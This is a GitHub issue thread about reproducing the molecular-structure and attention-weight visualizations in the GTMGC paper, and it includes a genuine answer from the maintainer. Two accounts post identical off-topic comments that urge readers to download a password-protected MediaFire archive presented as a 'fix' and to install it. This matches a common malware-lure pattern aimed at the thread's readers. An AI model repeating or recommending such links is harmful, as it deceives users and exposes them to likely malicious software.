### ISSUE TITLE
About Visualization Results

### ISSUE THREAD

**Issue by AmingWu** [Rich-XGK/GTMGC#4]
Dear Authors,

How to obtain the visualization results in Fig. 3 and 4?

Thank you

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Rich-XGK** [comment]
1. For visualizing molecular structures, you can refer to `./prediction_demo.ipynb`. Save the inferred result, `rdkit_pred_mol`, as a molecular file in formats like `.sdf` or `.mol`, and then open it with software like Chimera.

2. For visualizing attention weights, we have retained the code for returning attention scores in the network implementation, which may be commented out; you can uncomment it as needed. You can still refer to `./prediction_demo.ipynb` to obtain the attention scores from the network while inferring the molecular structure. Finally, fit these scores to the corresponding atoms for visualization.
